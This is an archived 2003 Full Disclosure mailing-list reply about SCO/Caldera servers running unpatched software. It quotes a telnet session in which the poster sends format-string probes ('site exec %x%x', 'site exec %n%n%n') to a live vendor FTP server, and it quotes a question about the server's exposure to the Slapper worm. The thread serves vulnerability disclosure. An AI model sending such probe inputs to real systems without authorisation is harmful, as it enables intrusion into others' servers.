Full Disclosure mailing list archives
Re: SCO Web Site Vulnerable to Slapper?
From: KF <dotslash () snosoft com>
Date: Tue, 19 Aug 2003 16:20:45 +0000
**** CALERA ARE YOU PAYING ATTENTION **** WAKE UP ****(normally I would not do this...) I am under the impression that either they probably don't care about their secuirty or they are ignorant... I reported this (see below) to them SEVERAL times... they use a vulnerable version of their own ftpd on their ftp server... can you say trojaned distribution site? They probably have not patched it because no one has produced a public exploit... they DO have a patch available however.
telnet ftpput.caldera.com 21 Trying 216.250.128.33... Connected to ftpput.caldera.com. Escape character is '^]'. 220 artemis FTP server (Version 2.1WU(1)) ready. user anonymous 331 Guest login ok, send e-mail address as password. pass err@ 230-Welcome to Caldera's FTP Archive Site 230-
...
230 Guest login ok, access restrictions apply. site exec %x%x 200-d2 200 (end of '%x%x') site exec %n%n%n Connection closed by foreign host.
-KF ------------------------------------------------- subject: [Full-Disclosure] SCO Web Site Vulnerable to Slapper? integerdotonefourfivenine () yahoo com wrote: They seem to be running Apache/1.3.14 (Unix) mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux, which, if I have my facts straight, is vulnerable to <URL:http://www.cert.org/advisories/CA-2002-27.html>. Am I correct? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- SCO Web Site Vulnerable to Slapper? Gherkin McDonalds (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Larry W. Cashdollar (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? KF (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Andreas Gietl (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Jeremiah Cornelius (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? KF (Aug 19)
- RE: SCO Web Site Vulnerable to Slapper? Drew Copley (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Anthony Saffer (Aug 19)
- RE: SCO Web Site Vulnerable to Slapper? Justin Shin (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Jeremiah Cornelius (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? KF (Aug 19)
- RE: SCO Web Site Vulnerable to Slapper? Dan Stromberg (Aug 19)
- Re: SCO Web Site Vulnerable to Slapper? Jeremiah Cornelius (Aug 19)